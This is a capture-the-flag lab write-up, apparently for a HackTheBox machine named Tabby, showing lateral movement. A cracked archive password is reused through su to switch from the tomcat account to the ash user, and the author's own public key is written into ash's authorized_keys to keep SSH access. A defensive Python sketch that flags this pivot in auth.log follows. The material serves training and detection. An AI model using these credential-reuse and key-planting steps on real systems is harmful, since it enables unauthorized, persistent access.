Password Reuse
Checking for password reuse of the cracked archive password against the target SSH server
┌──(kali㉿kali)-[~/…/backup/var/www/html]
└─$ ssh ash@$IP
The authenticity of host '10.10.10.194 (10.10.10.194)' can't be established.
ed25519 key fingerprint is sha256:mUt3fTn2/uoySPc6XapKq69a2/3EPRdW0T79hZ2davk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
warning: Permanently added '10.10.10.194' (ED25519) to the list of known hosts.
ash@10.10.10.194: Permission denied (publickey).
The SSH login failed: the target SSH server is configured to accept key-file (publickey) authentication ONLY, so the password cannot be tested over SSH
tomcat@tabby:/var/www/html/files$ su ash
password: admin@it
ash@tabby:/var/www/html/files$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
However, I can simply switch users from the existing shell session
Password reuse confirmed for the ash user
In order to establish a stable shell session, I will attempt to write my own SSH public key into the authorized_keys file of the ash user
SSH
ash@tabby:/var/www/html/files$ ll ~/.ssh
ls: cannot access '/home/ash/.ssh': No such file or directory
The ash user doesn’t even have the SSH directory (~/.ssh)
ash@tabby:/var/www/html/files$ mkdir ~/.ssh
I’ll make one
ash@tabby:/var/www/html/files$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
Now, writing my own public key to the authorized_keys file of the ash user
┌──(kali㉿kali)-[~/…/backup/var/www/html]
└─$ ssh ash@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 23 Sep 2023 12:09:50 PM UTC
System load: 0.14 Processes: 231
Usage of /: 52.4% of 6.82GB Users logged in: 0
Memory usage: 53% IPv4 address for ens160: 10.10.10.194
Swap usage: 0%
283 updates can be installed immediately.
152 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue May 19 11:48:00 2020
ash@tabby:~$ whoami
ash
ash@tabby:~$ hostname
tabby
ash@tabby:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.194 netmask 255.255.255.0 broadcast 10.10.10.255
ether 00:50:56:b9:7b:bb txqueuelen 1000 (Ethernet)
RX packets 2499629 bytes 406882415 (406.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2549609 bytes 1290995730 (1.2 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 22353 bytes 1742993 (1.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22353 bytes 1742993 (1.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Lateral movement made to the ash user via SSH
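From the defender's side, the two steps above (su from the tomcat service account to ash, then a key-based SSH login as ash) leave a correlatable trail in auth.log. The following is an added detection sketch, not part of the original writeup: the log lines are constructed and modelled on Ubuntu's su/sshd messages, and the service-account list, source IPs, 30-minute window and the find_pivots name are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed auth.log lines (not from the page); fingerprints are placeholders.
SAMPLE_LOG = """\
Sep 23 11:40:02 tabby sshd[2210]: Accepted publickey for bob from 192.0.2.20 port 40112 ssh2: ED25519 SHA256:<fingerprint>
Sep 23 12:01:13 tabby su: (to ash) tomcat on pts/0
Sep 23 12:01:13 tabby su: pam_unix(su:session): session opened for user ash by (uid=997)
Sep 23 12:03:41 tabby su: (to root) bob on pts/1
Sep 23 12:09:50 tabby sshd[4321]: Accepted publickey for ash from 192.0.2.10 port 51234 ssh2: ED25519 SHA256:<fingerprint>
"""

SERVICE_ACCOUNTS = {"tomcat", "www-data"}  # assumption: accounts that should never run su
WINDOW = timedelta(minutes=30)             # assumption: correlation window

SU_RE = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) \S+ su(?:\[\d+\])?: \(to (\S+)\) (\S+) on ")
SSH_RE = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: Accepted publickey for (\S+) from (\S+) ")


def _ts(stamp, year=2023):
    # syslog timestamps omit the year, so the caller supplies it
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def find_pivots(log_text):
    """Alert on su run by a service account, and on any key-based SSH login
    to the same target user that follows within WINDOW."""
    pivots, alerts = {}, []
    for line in log_text.splitlines():
        if m := SU_RE.match(line):
            when, target, source = _ts(m[1]), m[2], m[3]
            if source in SERVICE_ACCOUNTS:
                pivots[target] = when
                alerts.append(("su_from_service_account", source, target))
        elif m := SSH_RE.match(line):
            when, user, src_ip = _ts(m[1]), m[2], m[3]
            if user in pivots and timedelta(0) <= when - pivots[user] <= WINDOW:
                alerts.append(("ssh_key_login_after_su", user, src_ip))
    return alerts


if __name__ == "__main__":
    for alert in find_pivots(SAMPLE_LOG):
        print(alert)
```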